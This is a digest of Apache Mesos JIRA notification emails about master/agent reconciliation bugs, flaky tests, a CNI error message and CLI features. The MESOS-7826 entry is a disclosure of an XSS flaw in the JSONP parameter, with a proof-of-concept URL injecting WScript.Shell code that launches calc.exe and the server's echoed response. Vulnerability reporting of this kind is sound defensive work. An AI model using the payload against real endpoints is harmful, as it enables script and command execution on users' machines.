https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7911:
--
Sprint: Mesosphere Sprint 74

> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
> void Master::reconcileKnownSlave(
> Slave* slave,
> const vector& executors,
> const vector& tasks)
> {
>   ...
>   // TODO(bmahler): There's an implicit assumption here the slave
>   // cannot have tasks unknown to the master. This _should_ be the
>   // case since the causal relationship is:
>   //   slave removes task -> master removes task
>   // Add error logging for any violations of this assumption!
> ```
> As a result, the tasks would remain on the agent but the master would not 
> know about them!
> A more appropriate action here would be:
> (1) When an agent disconnects, mark the tasks as unreachable.
>   (a) If the framework is not partition aware, only show it the last known 
> task state.
>   (b) If the framework is partition aware, let it know that it's now 
> unreachable.
> (2) If the agent re-connects:
>   (a) And the agent had restarted, let the non-checkpointing framework know 
> its tasks are GONE/LOST.
>   (b) If the agent still holds the tasks, the tasks are restored as reachable.
> (3) If the agent gets removed:
>   (a) For partition aware non-checkpointing frameworks, let them know the 
> tasks are unreachable.
>   (b) For non partition aware non-checkpointing frameworks, let them know the 
> tasks are lost and kill them if the agent comes back.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-7911:
-

Assignee: (was: Gilbert Song)

> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
> void Master::reconcileKnownSlave(
> Slave* slave,
> const vector& executors,
> const vector& tasks)
> {
>   ...
>   // TODO(bmahler): There's an implicit assumption here the slave
>   // cannot have tasks unknown to the master. This _should_ be the
>   // case since the causal relationship is:
>   //   slave removes task -> master removes task
>   // Add error logging for any violations of this assumption!
> ```
> As a result, the tasks would remain on the agent but the master would not 
> know about them!
> A more appropriate action here would be:
> (1) When an agent disconnects, mark the tasks as unreachable.
>   (a) If the framework is not partition aware, only show it the last known 
> task state.
>   (b) If the framework is partition aware, let it know that it's now 
> unreachable.
> (2) If the agent re-connects:
>   (a) And the agent had restarted, let the non-checkpointing framework know 
> its tasks are GONE/LOST.
>   (b) If the agent still holds the tasks, the tasks are restored as reachable.
> (3) If the agent gets removed:
>   (a) For partition aware non-checkpointing frameworks, let them know the 
> tasks are unreachable.
>   (b) For non partition aware non-checkpointing frameworks, let them know the 
> tasks are lost and kill them if the agent comes back.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7887) `GET_EXECUTORS` and `/state` is not consistent between master and agent

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7887?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7887:
--
Priority: Minor  (was: Critical)

> `GET_EXECUTORS` and `/state` is not consistent between master and agent
> ---
>
> Key: MESOS-7887
> URL: https://issues.apache.org/jira/browse/MESOS-7887
> Project: Mesos
>  Issue Type: Improvement
>  Components: HTTP API, master
>Affects Versions: 1.3.0, 1.5.0
>Reporter: Alexander Rojas
>Priority: Minor
>  Labels: master, mesosphere, v1_api
>
> The master seem not to keep information about the executors since they are 
> not returned either either by getting the master state (with either v0 and v1 
> API's) or with the call {{GET_EXECUTORS}}. Creating a cluster as follows:
> {noformat}
> ./bin/mesos-master.sh \
> --ip=${MASTER_IP} \
> --work_dir=/tmp/mesos/master \
> --log_dir=/tmp/mesos/master/log
> {noformat}
> {noformat}
> sudo ./bin/mesos-agent.sh \
> --master=${MASTER_IP}:5050 \
> --work_dir=/tmp/mesos/agent \
> --log_dir=/tmp/mesos/agent/log \
> --containerizers=mesos,docker
> {noformat}
> And launch  a couple of frameworks as follows:
> {noformat}
> ./src/mesos-execute \
> --master=${MASTER_IP}:5050 \
> 
> --task='{"name":"test-custom-command","task_id":{"value":"test-custom-command-task-1"},"agent_id":{"value":"50f4e551-aa5c-42db-8967-4dc3ee11658f-S0"},"resources":[{"name":"cpus","type":"SCALAR","scalar":{"value":1}},{"name":"mem","type":"SCALAR","scalar":{"value":32}},{"name":"disk","type":"SCALAR","scalar":{"value":32}}],"executor":{"executor_id":{"value":"test-custom-command-executor"},"command":{"value":"while
>  true; do echo \"Hello World\"; sleep 5; done;"}}}'
> {noformat}
> {noformat}
> ./src/mesos-execute \
> --master=${MASTER_IP}:5050 \
> --name=test-command \
> --command='while true; do echo "Hello World"; sleep 5; done;' \
> --containerizer=docker \
> --docker_image=ubuntu:latest
> {noformat}
> Not using the operator endpoints on the agent:
> {noformat}
> $ http POST ${AGENT_IP}:5051/api/v1 type=GET_EXECUTORS
> {
>   "get_executors": {
> "completed_executors": [
> ],
> "executors": [
>   {
> "executor_info": {
>   "command": {
> "arguments": [
>   "mesos-executor",
>   "--launcher_dir=/workspace/mesos/build/src"
> ],
> "shell": false,
> "value": "/workspace/mesos/build/src/mesos-executor"
>   },
>   "container": {
> "docker": {
>   "image": "ubuntu:latest",
>   "network": "HOST",
>   "privileged": false
> },
> "type": "DOCKER"
>   },
>   "executor_id": {
> "value": "test-command"
>   },
>   "framework_id": {
> "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-0001"
>   },
>   "name": "Command Executor (Task: test-command) (Command: sh -c 
> 'while true; ...')",
>   "resources": [
> {
>   "allocation_info": {
> "role": "*"
>   },
>   "name": "cpus",
>   "scalar": {
> "value": 0.1
>   },
>   "type": "SCALAR"
> },
> {
>   "allocation_info": {
> "role": "*"
>   },
>   "name": "mem",
>   "scalar": {
> "value": 32
>   },
>   "type": "SCALAR"
> }
>   ],
>   "source": "test-command"
> }
>   },
>   {
> "executor_info": {
>   "command": {
> "shell": true,
> "value": "while true; do echo \"Hello World\"; sleep 5; done;"
>   },
>   "executor_id": {
> "value": "test-custom-command-executor"
>   },
>   "framework_id": {
> "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-"
>   }
> }
>   }
> ]
>   },
>   "type": "GET_EXECUTORS"
> }
> {noformat}
> While the master does
> {noformat}
>  http POST ${MASTER_IP}:5050/api/v1 type=GET_EXECUTORS
> {
> "get_executors": {},
> "type": "GET_EXECUTORS"
> }
> {noformat}
> These results are consistent using the `/state` endpoint on both, agent and 
> master as well as using the {{GET_STATE}} v1 API call. The agent returns 
> information about executors, while the master response has none.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7991) fatal, check failed !framework->recovered()

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7991?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7991:
--
Sprint: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68, 
Mesosphere Sprint 74  (was: Mesosphere Sprint 66, Mesosphere Sprint 67, 
Mesosphere Sprint 68)

> fatal, check failed !framework->recovered()
> ---
>
> Key: MESOS-7991
> URL: https://issues.apache.org/jira/browse/MESOS-7991
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Alexander Rukletsov
>Priority: Critical
>  Labels: reliability
>
> mesos master crashed on what appears to be framework recovery
> mesos master version: 1.3.1
> mesos agent version: 1.3.1
> {code}
> W0920 14:58:54.756364 25452 master.cpp:7568] Task 
> 862181ec-dffb-4c03-8807-5fb4c4e9a907 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756369 25452 master.cpp:7568] Task 
> 9c21c48a-63ad-4d58-9e22-f720af19a644 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756376 25452 master.cpp:7568] Task 
> 05c451f8-c48a-47bd-a235-0ceb9b3f8d0c of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756381 25452 master.cpp:7568] Task 
> e8641b1f-f67f-42fe-821c-09e5a290fc60 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756386 25452 master.cpp:7568] Task 
> f838a03c-5cd4-47eb-8606-69b004d89808 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756392 25452 master.cpp:7568] Task 
> 685ca5da-fa24-494d-a806-06e03bbf00bd of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> W0920 14:58:54.756397 25452 master.cpp:7568] Task 
> 65ccf39b-5c46-4121-9fdd-21570e8068e6 of framework 
> 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent 
> a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1)
> @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with 
> the agent
> F0920 14:58:54.756404 25452 master.cpp:7601] Check failed: 
> !framework->recovered()
> *** Check failure stack trace: ***
> @ 0x7f7bf80087ed  google::LogMessage::Fail()
> @ 0x7f7bf800a5a0  google::LogMessage::SendToLog()
> @ 0x7f7bf80083d3  google::LogMessage::Flush()
> @ 0x7f7bf800afc9  google::LogMessageFatal::~LogMessageFatal()
> @ 0x7f7bf736fe7e  
> mesos::internal::master::Master::reconcileKnownSlave()
> @ 0x7f7bf739e612  mesos::internal::master::Master::_reregisterSlave()
> @ 0x7f7bf73a580e  
> _ZNSt17_Function_handlerIFvPN7process11ProcessBaseEEZNS0_8dispatchIN5mesos8internal6master6MasterERKNS5_9SlaveInfoERKNS0_4UPIDERK6OptionINSt7__cxx1112basic_stringIcSt11char_traitsIcESaIc
> RKSt6vectorINS5_8ResourceESaISQ_EERKSP_INS5_12ExecutorInfoESaISV_EERKSP_INS5_4TaskESaIS10_EERKSP_INS5_13FrameworkInfoESaIS15_EERKSP_INS6_17Archive_FrameworkESaIS1A_EERKSL_RKSP_INS5_20SlaveInfo_CapabilityESaIS
> 1H_EERKNS0_6FutureIbEES9_SC_SM_SS_SX_S12_S17_S1C_SL_S1J_S1N_EEvRKNS0_3PIDIT_EEMS1R_FvT0_T1_T2_T3_T4_T5_T6_T7_T8_T9_T10_ET11_T12_T13_T14_T15_T16_T17_T18_T19_T20_T21_EUlS2_E_E9_M_invokeERKSt9_Any_dataOS2_
> @ 0x7f7bf7f5e69c  process::ProcessBase::visit()
> @ 0x7f7bf7f71403  process::ProcessManager::resume()
> @ 0x7f7bf7f7c127  
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUt_vEEE6_M_runEv
> @ 0x7f7bf60b5c80  (unknown)
> @ 0x7f7bf58c86ba  start_thread
> @ 0x7f7bf55fe3dd  (unknown)
> mesos-master.service: Main process exited, code=killed, status=6/ABRT
> mesos-master.service: Unit entered failed state.
> mesos-master.service: Failed with result 'signal'.
> {code}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-5918:
--
Labels: security  (was: )

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api, webui
>Reporter: Yan Xu
>Priority: Major
>  Labels: security
>
> We currently use the {{jsonp}} technique to bypass CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-5918:
--
Component/s: json api

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api, webui
>Reporter: Yan Xu
>Priority: Major
>  Labels: security
>
> We currently use the {{jsonp}} technique to bypass CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7826) XSS in JSONP parameter

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7826:
--
Labels: security  (was: )

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>  Labels: security
>
> It is possible to inject arbitrary content into a server request. Take into 
> account the following url: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing 
> the file (state.js), it will pop-up a calculator. It's my recommendation to 
> apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6551) Add attach/exec commands to the Mesos CLI

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6551:
--
Priority: Major  (was: Critical)

> Add attach/exec commands to the Mesos CLI
> -
>
> Key: MESOS-6551
> URL: https://issues.apache.org/jira/browse/MESOS-6551
> Project: Mesos
>  Issue Type: Task
>  Components: cli
>Reporter: Kevin Klues
>Assignee: Armand Grillet
>Priority: Major
>  Labels: debugging, mesosphere
>
> After all of this support has landed, we need to update the Mesos CLI to 
> implement {{attach}} and {{exec}} functionality as outlined in the Design Doc



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8471) Allow revocable_resources capability for mesos-execute

2018-01-23 Thread Zhitao Li (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8471?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336149#comment-16336149
 ] 

Zhitao Li commented on MESOS-8471:
--

A quick attempt is at https://reviews.apache.org/r/65294/

> Allow revocable_resources capability for mesos-execute
> --
>
> Key: MESOS-8471
> URL: https://issues.apache.org/jira/browse/MESOS-8471
> Project: Mesos
>  Issue Type: Improvement
>  Components: cli
>Reporter: Zhitao Li
>Priority: Minor
>
> While mesos-execute is a nice tool to quickly test certain behavior of Mesos 
> itself without an external framework, it seems there is not direct way to 
> test revocable support in it.
> A quick test with the binary suggests that if we infer *REVOCABLE_RESOURCES* 
> capability from input, this should allow revocable resources on `task` or 
> `task_group` to be launched to Mesos.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336134#comment-16336134
 ] 

Andrei Budnik commented on MESOS-7506:
--

Steps to reproduce `LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags`:
 # Add {{::sleep(1);}} before 
[removing|https://github.com/apache/mesos/blob/e91ce42ed56c5ab65220fbba740a8a50c7f835ae/src/linux/cgroups.cpp#L483]
 "test" cgroup
 # recompile
 # run `GLOG_v=2 sudo GLOG_v=2 ./src/mesos-tests 
--gtest_filter=LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags 
--gtest_break_on_failure --gtest_repeat=10 --verbose`

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335940#comment-16335940
 ] 

Benjamin Bannier commented on MESOS-8474:
-

This failed again with a different error,

{noformat}
../../src/tests/storage_local_resource_provider_tests.cpp:1877
block is NONE
{noformat}

I attached [the full test 
log|https://issues.apache.org/jira/secure/attachment/12907300/consoleText.txt].

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt, consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

Attachment: consoleText.txt

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt, consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8478:

Labels: flaky flaky-test mesosphere  (was: )

> Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
> ---
>
> Key: MESOS-8478
> URL: https://issues.apache.org/jira/browse/MESOS-8478
> Project: Mesos
>  Issue Type: Bug
>  Components: master, test
>Affects Versions: 1.6.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
> {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
> Mock function called more times than expected - returning default value.
> Function call: authorized(@0x7fe1108c61e0 48-byte object  E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F 
> 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>)
>   Returns: Abandoned
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8478:

Attachment: consoleText.txt

> Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
> ---
>
> Key: MESOS-8478
> URL: https://issues.apache.org/jira/browse/MESOS-8478
> Project: Mesos
>  Issue Type: Bug
>  Components: master, test
>Affects Versions: 1.6.0
>Reporter: Benjamin Bannier
>Priority: Major
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
> {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
> Mock function called more times than expected - returning default value.
> Function call: authorized(@0x7fe1108c61e0 48-byte object  E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F 
> 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>)
>   Returns: Abandoned
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)
Benjamin Bannier created MESOS-8478:
---

 Summary: Test MasterTestPrePostReservationRefinement.LaunchTask is 
flaky
 Key: MESOS-8478
 URL: https://issues.apache.org/jira/browse/MESOS-8478
 Project: Mesos
  Issue Type: Bug
  Components: master, test
Affects Versions: 1.6.0
Reporter: Benjamin Bannier


Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
{{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},

{noformat}
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
Mock function called more times than expected - returning default value.
Function call: authorized(@0x7fe1108c61e0 48-byte object )
  Returns: Abandoned
 Expected: to be called once
   Actual: called twice - over-saturated and active
{noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335568#comment-16335568
 ] 

Qian Zhang commented on MESOS-6822:
---

The way we checked the return value of {{os::spawn}} is not correct, we will 
return {{os::strerror(errno)}} as long as {{os::spawn}} return non-zero. 
However, when you look at the implementation of {{os::spawn}}, it calls 
{{waitpid}} on the child process and return its exit status, so when the child 
process exits with a non-zero status (e.g., it will exit with 127 if the 
command to be executed can not be found), we will return 
{{os::strerror(errno)}}, but it is actually {{Success}} because {{waitpid}} 
succeeds.

We should follow the way of the code below to handle the return value of 
{{os::spawn}}.

https://github.com/apache/mesos/blob/1.4.1/src/linux/fs.cpp#L481:L497

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-6822:
--
Shepherd: Jie Yu
Story Points: 2
  Sprint: Mesosphere Sprint 73
Target Version/s: 1.6.0

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)